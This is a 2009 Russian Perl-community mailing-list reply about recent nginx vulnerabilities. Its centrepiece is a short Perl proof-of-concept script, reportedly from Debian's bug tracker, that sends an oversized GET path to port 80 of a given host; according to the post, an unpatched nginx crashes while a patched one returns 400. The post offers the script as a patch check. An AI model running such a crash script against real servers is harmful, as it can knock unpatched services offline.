[Moscow.pm] Юзер-френдли сайты
Sergey Aleynikov
sergey.aleynikov на gmail.com
Ср Окт 28 08:07:25 PDT 2009
> Быстро обновиться не всегда возможно, когда есть свои самописные
> модули. Хотя оба последних патча простые и к данному случаю не
> подходят
Я только про последние уязвимости, не про обновления вообще. Сам сижу
на 0.7.41+2 патча
> А есть эксплойт, которым можно проверить факт пропатчинности nginx-а ?
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl <hostname>\n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";
while(<$sock>) {
print;
}
Опубликован был в дебиановском багтрекере. Патченная версия выдаёт 400
Bad Request, непропатченная - валится в корку и закрывает соединение.
Подробная информация о списке рассылки Moscow-pm